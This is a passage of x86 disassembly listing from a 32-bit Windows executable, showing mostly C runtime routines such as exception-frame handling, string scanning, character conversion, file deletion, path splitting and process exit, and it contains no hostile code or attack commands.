inc eax
mov [ebp+var_10], offset loc_413B5D
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_418F70
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_413D01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413D52 proc near ; CODE XREF: sub_418BC7+33�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_413B81
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_413DD5
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_415456
call dword ptr [eax+74h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_413DD5: ; DATA XREF: sub_413D52+3A�o
cmp [ebp+var_4], 0
jz short loc_413DF2
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_413DFB
; ---------------------------------------------------------------------------
loc_413DF2: ; CODE XREF: sub_413D52+87�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_413DFB: ; CODE XREF: sub_413D52+9E�j
mov eax, [ebp+var_34]
pop ebx
leave
retn
sub_413D52 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413E04 proc near ; CODE XREF: sub_41BAF0+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_413E1C
push [ebp+arg_0]
call sub_41E8A6 ; RtlUnwind
loc_413E1C: ; DATA XREF: sub_413E04+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_413E04 endp
; =============== S U B R O U T I N E =======================================
sub_413E24 proc near ; DATA XREF: sub_413E46+A�o
; sub_413EAE+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_413E45
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_413E45: ; CODE XREF: sub_413E24+10�j
retn
sub_413E24 endp
; =============== S U B R O U T I N E =======================================
sub_413E46 proc near ; CODE XREF: sub_41BAF0+67�p
; sub_41BAF0+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_413E24
push large dword ptr fs:0
mov large fs:0, esp
loc_413E63: ; CODE XREF: sub_413E46:loc_413E9E�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_413EA0
cmp esi, [esp+1Ch+arg_4]
jz short loc_413EA0
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_413E9E
push 101h
mov eax, [ebx+esi*4+8]
call sub_413EDA
call dword ptr [ebx+esi*4+8]
loc_413E9E: ; CODE XREF: sub_413E46+44�j
jmp short loc_413E63
; ---------------------------------------------------------------------------
loc_413EA0: ; CODE XREF: sub_413E46+2A�j
; sub_413E46+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_413E46 endp
; =============== S U B R O U T I N E =======================================
sub_413EAE proc near ; CODE XREF: sub_418980+55�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_413E24
jnz short locret_413ED0
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_413ED0
mov eax, 1
locret_413ED0: ; CODE XREF: sub_413EAE+10�j
; sub_413EAE+1B�j
retn
sub_413EAE endp
; =============== S U B R O U T I N E =======================================
sub_413ED1 proc near ; CODE XREF: sub_418F70+1E�p
; sub_418F70+40�p
push ebx
push ecx
mov ebx, offset dword_42C730
jmp short loc_413EE4
sub_413ED1 endp
; =============== S U B R O U T I N E =======================================
sub_413EDA proc near ; CODE XREF: sub_413E46+4F�p
; sub_41BAF0+78�p
push ebx
push ecx
mov ebx, offset dword_42C730
mov ecx, [ebp+8]
loc_413EE4: ; CODE XREF: sub_413ED1+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_413EDA endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_413EF4 proc near ; CODE XREF: sub_405F46+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_413EF4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_413F30
loc_413F20: ; CODE XREF: sub_413F30+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_413F30
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_413F30 proc near ; CODE XREF: sub_405FC7+21�p
; sub_406702+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00413F20 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_413F36: ; CODE XREF: sub_413920+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_413F5D
loc_413F48: ; CODE XREF: sub_413F30+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_413F20
test cl, cl
jz short loc_413FA6
test edx, 3
jnz short loc_413F48
loc_413F5D: ; CODE XREF: sub_413F30+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_413F68: ; CODE XREF: sub_413F30+63�j
; sub_413F30+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_413FAA
and eax, 81010100h
jz short loc_413F68
and eax, 1010100h
jnz short loc_413FA4
and esi, 80000000h
jnz short loc_413F68
loc_413FA4: ; CODE XREF: sub_413F30+6A�j
; sub_413F30+83�j ...
pop esi
pop edi
loc_413FA6: ; CODE XREF: sub_413F30+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_413FAA: ; CODE XREF: sub_413F30+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_413FE7
test al, al
jz short loc_413FA4
cmp ah, bl
jz short loc_413FE0
test ah, ah
jz short loc_413FA4
shr eax, 10h
cmp al, bl
jz short loc_413FD9
test al, al
jz short loc_413FA4
cmp ah, bl
jz short loc_413FD2
test ah, ah
jz short loc_413FA4
jmp short loc_413F68
; ---------------------------------------------------------------------------
loc_413FD2: ; CODE XREF: sub_413F30+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_413FD9: ; CODE XREF: sub_413F30+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_413FE0: ; CODE XREF: sub_413F30+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_413FE7: ; CODE XREF: sub_413F30+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_413F30 endp
; =============== S U B R O U T I N E =======================================
sub_413FEE proc near ; CODE XREF: sub_4065CE+55�p
; sub_40E9C5+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
loc_413FF2: ; CODE XREF: sub_413FEE+C�j
mov cx, [eax]
inc eax
inc eax
test cx, cx
jnz short loc_413FF2
sub eax, [esp+arg_0]
sar eax, 1
dec eax
retn
sub_413FEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414004 proc near ; CODE XREF: sub_4140FA+22�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_4140CB
mov ebx, [ebp+arg_C]
cmp ebx, esi
jz loc_4140F5
mov edi, [ebp+arg_0]
cmp [edi+14h], esi
jnz short loc_414056
cmp ebx, esi
jbe loc_4140F5
loc_414035: ; CODE XREF: sub_414004+4B�j
mov ecx, [ebp+arg_8]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_4140F5
inc eax
inc edx
inc edx
cmp eax, ebx
jb short loc_414035
jmp loc_4140F5
; ---------------------------------------------------------------------------
loc_414056: ; CODE XREF: sub_414004+27�j
mov esi, ds:dword_41F0A8
push ebx
mov ebx, [ebp+arg_8]
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_4140F4
call ds:dword_41F008 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_41408E
loc_41407E: ; CODE XREF: sub_414004+C5�j
; sub_414004+EE�j
call sub_417C70
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4140F5
; ---------------------------------------------------------------------------
loc_41408E: ; CODE XREF: sub_414004+78�j
mov eax, [ebp+arg_C]
mov [ebp+var_4], eax
mov eax, ebx
loc_414096: ; CODE XREF: sub_414004+AE�j
mov cl, [eax]
dec [ebp+var_4]
test cl, cl
jz short loc_4140B4
mov edx, [edi+48h]
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4140AD
inc eax
loc_4140AD: ; CODE XREF: sub_414004+A6�j
inc eax
cmp [ebp+var_4], 0
jnz short loc_414096
loc_4140B4: ; CODE XREF: sub_414004+99�j
push [ebp+arg_C]
sub eax, ebx
push [ebp+arg_4]
push eax
push ebx
push 1
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_4140F5
jmp short loc_41407E
; ---------------------------------------------------------------------------
loc_4140CB: ; CODE XREF: sub_414004+10�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_4140DE
push [ebp+arg_8]
call sub_416000
pop ecx
jmp short loc_4140F5
; ---------------------------------------------------------------------------
loc_4140DE: ; CODE XREF: sub_414004+CD�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_8]
push 9
push dword ptr [eax+4]
call ds:dword_41F0A8 ; MultiByteToWideChar
cmp eax, esi
jz short loc_41407E
loc_4140F4: ; CODE XREF: sub_414004+69�j
dec eax
loc_4140F5: ; CODE XREF: sub_414004+1B�j
; sub_414004+2B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_414004 endp
; =============== S U B R O U T I N E =======================================
sub_4140FA proc near ; CODE XREF: sub_4065CE+19�p
; sub_4065CE+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41410F
call sub_41628E
loc_41410F: ; CODE XREF: sub_4140FA+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_414004
add esp, 10h
retn
sub_4140FA endp
; =============== S U B R O U T I N E =======================================
sub_414125 proc near ; CODE XREF: sub_4078FA+4D6C�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_41F0B8 ; DeleteFileA
test eax, eax
jnz short loc_41413B
call ds:dword_41F008 ; RtlGetLastWin32Error
jmp short loc_41413D
; ---------------------------------------------------------------------------
loc_41413B: ; CODE XREF: sub_414125+C�j
xor eax, eax
loc_41413D: ; CODE XREF: sub_414125+14�j
test eax, eax
jz short loc_41414C
push eax
call sub_417C82
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41414C: ; CODE XREF: sub_414125+1A�j
xor eax, eax
retn
sub_414125 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41414F proc near ; CODE XREF: sub_4078FA+4CD6�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 14h
push offset stru_427750
call __SEH_prolog
mov esi, [ebp+arg_0]
mov [ebp+var_1C], esi
push esi
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_418FBC
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push esi
call sub_414CA3
mov [ebp+var_24], eax
push esi
push [ebp+var_20]
call sub_419044
add esp, 18h
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4141A3
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_41414F endp
; =============== S U B R O U T I N E =======================================
sub_4141A3 proc near ; CODE XREF: sub_41414F+46�p
; DATA XREF: .rdata:stru_427750�o
push dword ptr [ebp-1Ch]
call sub_4166C5
pop ecx
retn
sub_4141A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141AD proc near ; CODE XREF: sub_4078FA+3EE6�p
; sub_40D1EF+F6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_416000
cmp eax, 1
pop ecx
jb short loc_4141E9
cmp byte ptr [ebx+1], 3Ah
jnz short loc_4141E9
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_4141E5
push 2
push ebx
push esi
call sub_4195CB
add esp, 0Ch
and byte ptr [esi+2], 0
loc_4141E5: ; CODE XREF: sub_4141AD+26�j
inc ebx
inc ebx
jmp short loc_4141F3
; ---------------------------------------------------------------------------
loc_4141E9: ; CODE XREF: sub_4141AD+19�j
; sub_4141AD+1F�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4141F3
and byte ptr [eax], 0
loc_4141F3: ; CODE XREF: sub_4141AD+3A�j
; sub_4141AD+41�j
and [ebp+arg_0], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov [ebp+var_8], eax
mov esi, 0FFh
jz short loc_41426B
loc_414206: ; CODE XREF: sub_4141AD+88�j
mov cl, [eax]
movzx edx, cl
test byte_47A401[edx], 4
jz short loc_414217
inc eax
jmp short loc_414231
; ---------------------------------------------------------------------------
loc_414217: ; CODE XREF: sub_4141AD+65�j
cmp cl, 2Fh
jz short loc_41422B
cmp cl, 5Ch
jz short loc_41422B
cmp cl, 2Eh
jnz short loc_414231
mov [ebp+var_4], eax
jmp short loc_414231
; ---------------------------------------------------------------------------
loc_41422B: ; CODE XREF: sub_4141AD+6D�j
; sub_4141AD+72�j
lea ecx, [eax+1]
mov [ebp+arg_0], ecx
loc_414231: ; CODE XREF: sub_4141AD+68�j
; sub_4141AD+77�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_414206
mov edi, [ebp+arg_0]
test edi, edi
mov [ebp+var_8], eax
jz short loc_41426B
cmp [ebp+arg_8], 0
jz short loc_414266
sub edi, ebx
cmp edi, esi
jb short loc_41424F
mov edi, esi
loc_41424F: ; CODE XREF: sub_4141AD+9E�j
push edi
push ebx
push [ebp+arg_8]
call sub_4195CB
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_414266: ; CODE XREF: sub_4141AD+98�j
mov ebx, [ebp+arg_0]
jmp short loc_414275
; ---------------------------------------------------------------------------
loc_41426B: ; CODE XREF: sub_4141AD+57�j
; sub_4141AD+92�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_414275
and byte ptr [ecx], 0
loc_414275: ; CODE XREF: sub_4141AD+BC�j
; sub_4141AD+C3�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_4142C8
cmp edi, ebx
jb short loc_4142C8
cmp [ebp+arg_C], 0
jz short loc_4142A5
sub edi, ebx
cmp edi, esi
jb short loc_41428E
mov edi, esi
loc_41428E: ; CODE XREF: sub_4141AD+DD�j
push edi
push ebx
push [ebp+arg_C]
call sub_4195CB
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_4142A5: ; CODE XREF: sub_4141AD+D7�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_4142F0
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_4142B5
mov esi, eax
loc_4142B5: ; CODE XREF: sub_4141AD+104�j
push esi
push [ebp+var_4]
push edi
call sub_4195CB
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_4142F0
; ---------------------------------------------------------------------------
loc_4142C8: ; CODE XREF: sub_4141AD+CD�j
; sub_4141AD+D1�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_4142E6
sub eax, ebx
cmp eax, esi
jnb short loc_4142D7
mov esi, eax
loc_4142D7: ; CODE XREF: sub_4141AD+126�j
push esi
push ebx
push edi
call sub_4195CB
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_4142E6: ; CODE XREF: sub_4141AD+120�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_4142F0
and byte ptr [eax], 0
loc_4142F0: ; CODE XREF: sub_4141AD+FD�j
; sub_4141AD+119�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4141AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142F5 proc near ; CODE XREF: sub_4078FA+3409�p
; sub_4078FA+3436�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 18h
push offset stru_427760
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov edi, ebx
mov [ebp+var_1C], ebx
cmp [ebp+arg_4], 0
jg short loc_414313
xor eax, eax
jmp short loc_41436A
; ---------------------------------------------------------------------------
loc_414313: ; CODE XREF: sub_4142F5+18�j
mov esi, [ebp+arg_8]
mov [ebp+var_20], esi
push esi
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
loc_414324: ; CODE XREF: sub_4142F5+64�j
dec [ebp+arg_4]
jz short loc_41435B
dec dword ptr [esi+4]
js short loc_414338
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41433F
; ---------------------------------------------------------------------------
loc_414338: ; CODE XREF: sub_4142F5+37�j
push esi
call sub_417455
pop ecx
loc_41433F: ; CODE XREF: sub_4142F5+41�j
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jnz short loc_414351
cmp edi, ebx
jnz short loc_41435B
and [ebp+var_1C], 0
jmp short loc_41435E
; ---------------------------------------------------------------------------
loc_414351: ; CODE XREF: sub_4142F5+50�j
mov [edi], al
inc edi
mov [ebp+var_28], edi
cmp al, 0Ah
jnz short loc_414324
loc_41435B: ; CODE XREF: sub_4142F5+32�j
; sub_4142F5+54�j
and byte ptr [edi], 0
loc_41435E: ; CODE XREF: sub_4142F5+5A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414373
mov eax, [ebp+var_1C]
loc_41436A: ; CODE XREF: sub_4142F5+1C�j
call __SEH_epilog
retn
sub_4142F5 endp
; =============== S U B R O U T I N E =======================================
sub_414370 proc near ; DATA XREF: .rdata:stru_427760�o
mov esi, [ebp-20h]
sub_414370 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414373 proc near ; CODE XREF: sub_4142F5+6D�p
push esi
call sub_4166C5
pop ecx
retn
sub_414373 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414380 proc near ; CODE XREF: sub_4078FA+8DA�p
; sub_410A22+285�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_4143B2
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_4143B0
jz short loc_4143B2
sub ecx, 2
loc_4143B0: ; CODE XREF: sub_414380+29�j
not ecx
loc_4143B2: ; CODE XREF: sub_414380+9�j
; sub_414380+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_414380 endp
; =============== S U B R O U T I N E =======================================
sub_4143B9 proc near ; CODE XREF: sub_414460+CB�p
; sub_414906+1C�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_41F078 ; GetModuleHandleA
test eax, eax
jz short loc_4143DE
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_41F074 ; GetProcAddress
test eax, eax
jz short loc_4143DE
push [esp+arg_0]
call eax ; dword_42A034
loc_4143DE: ; CODE XREF: sub_4143B9+D�j
; sub_4143B9+1D�j
push [esp+arg_0]
call ds:dword_41F02C ; ExitProcess
int 3 ; Trap to Debugger
loc_4143E9: ; CODE XREF: sub_419706+C�p
push 8
call sub_416901
pop ecx
retn
sub_4143B9 endp
; =============== S U B R O U T I N E =======================================
sub_4143F2 proc near ; CODE XREF: sub_419738�p
push 8
call sub_41686D
pop ecx
retn
sub_4143F2 endp
; =============== S U B R O U T I N E =======================================
sub_4143FB proc near ; CODE XREF: .text:loc_414A66�p
mov eax, off_42C718
test eax, eax
jz short loc_414406
call eax ; sub_413498
loc_414406: ; CODE XREF: sub_4143FB+7�j
push esi
push edi
mov ecx, offset dword_42A00C
mov edi, offset dword_42A024
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_414431
loc_41441A: ; CODE XREF: sub_4143FB+30�j
test eax, eax
jnz short loc_41445D
mov ecx, [esi]
test ecx, ecx
jz short loc_414426
call ecx
loc_414426: ; CODE XREF: sub_4143FB+27�j
add esi, 4
cmp esi, edi
jb short loc_41441A
test eax, eax
jnz short loc_41445D
loc_414431: ; CODE XREF: sub_4143FB+1D�j
push offset sub_419794
call sub_41973E
mov esi, offset dword_42A000
mov eax, esi
mov edi, offset dword_42A008
cmp eax, edi
pop ecx
jnb short loc_41445B
loc_41444C: ; CODE XREF: sub_4143FB+5E�j
mov eax, [esi]
test eax, eax
jz short loc_414454
call eax
loc_414454: ; CODE XREF: sub_4143FB+55�j
add esi, 4
cmp esi, edi
jb short loc_41444C
loc_41445B: ; CODE XREF: sub_4143FB+4F�j
xor eax, eax
loc_41445D: ; CODE XREF: sub_4143FB+21�j
; sub_4143FB+34�j
pop edi
pop esi
retn
sub_4143FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414460 proc near ; CODE XREF: sub_414533+8�p
; sub_414544+8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push 8
call sub_416901
xor esi, esi
inc esi
cmp dword_479E9C, esi
pop ecx
jnz short loc_414488
push [ebp+arg_0]
call ds:dword_41F0B4 ; GetCurrentProcess
push eax
call ds:dword_41F0BC ; TerminateProcess
loc_414488: ; CODE XREF: sub_414460+16�j
cmp [ebp+arg_4], 0
mov al, byte ptr [ebp+arg_8]
mov dword_479E98, esi
mov byte_479E94, al
jnz short loc_4144EE
mov ecx, dword_47B670
test ecx, ecx
jz short loc_4144CF
mov eax, dword_47B66C
sub eax, 4
cmp eax, ecx
jmp short loc_4144C8
; ---------------------------------------------------------------------------
loc_4144B2: ; CODE XREF: sub_414460+6D�j
mov eax, [eax]
test eax, eax
jz short loc_4144BA
call eax
loc_4144BA: ; CODE XREF: sub_414460+56�j
mov eax, dword_47B66C
sub eax, 4
cmp eax, dword_47B670
loc_4144C8: ; CODE XREF: sub_414460+50�j
mov dword_47B66C, eax
jnb short loc_4144B2
loc_4144CF: ; CODE XREF: sub_414460+44�j
mov eax, offset dword_42A028
mov esi, offset dword_42A030
cmp eax, esi
mov edi, eax
jnb short loc_4144EE
loc_4144DF: ; CODE XREF: sub_414460+8C�j
mov eax, [edi]
test eax, eax
jz short loc_4144E7
call eax
loc_4144E7: ; CODE XREF: sub_414460+83�j
add edi, 4
cmp edi, esi
jb short loc_4144DF
loc_4144EE: ; CODE XREF: sub_414460+3A�j
; sub_414460+7D�j
mov eax, offset dword_42A034
mov esi, offset dword_42A03C
cmp eax, esi
mov edi, eax
jnb short loc_41450D
loc_4144FE: ; CODE XREF: sub_414460+AB�j
mov eax, [edi]
test eax, eax
jz short loc_414506
call eax
loc_414506: ; CODE XREF: sub_414460+A2�j
add edi, 4
cmp edi, esi
jb short loc_4144FE
loc_41450D: ; CODE XREF: sub_414460+9C�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_41451E
push 8
call sub_41686D
jmp short loc_414530
; ---------------------------------------------------------------------------
loc_41451E: ; CODE XREF: sub_414460+B3�j
push [ebp+arg_0]
mov dword_479E9C, 1
call sub_4143B9
loc_414530: ; CODE XREF: sub_414460+BC�j
pop ecx
pop ebp
retn
sub_414460 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414533 proc near ; CODE XREF: .text:00414AB6�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_414460
add esp, 0Ch
retn
sub_414533 endp
; =============== S U B R O U T I N E =======================================
sub_414544 proc near ; CODE XREF: sub_4148E1+1C�p
; .text:00414AE3�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_414460
add esp, 0Ch
retn
sub_414544 endp
; =============== S U B R O U T I N E =======================================
sub_414555 proc near ; CODE XREF: .text:loc_414ABB�p
push 1
push 0
push 0
call sub_414460
add esp, 0Ch
retn
sub_414555 endp
; =============== S U B R O U T I N E =======================================
sub_414564 proc near ; CODE XREF: .text:loc_414AE8�p
push 1
push 1
push 0
call sub_414460
add esp, 0Ch
retn
sub_414564 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414580 proc near ; CODE XREF: sub_40FD69+3D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_4145A1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_4145F1
; ---------------------------------------------------------------------------
loc_4145A1: ; CODE XREF: sub_414580+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_4145AF: ; CODE XREF: sub_414580+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4145AF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_4145DA
cmp edx, [esp+4+arg_4]
ja short loc_4145DA
jb short loc_4145E2
cmp eax, [esp+4+arg_0]
jbe short loc_4145E2
loc_4145DA: ; CODE XREF: sub_414580+4A�j
; sub_414580+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_4145E2: ; CODE XREF: sub_414580+52�j
; sub_414580+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_4145F1: ; CODE XREF: sub_414580+1F�j
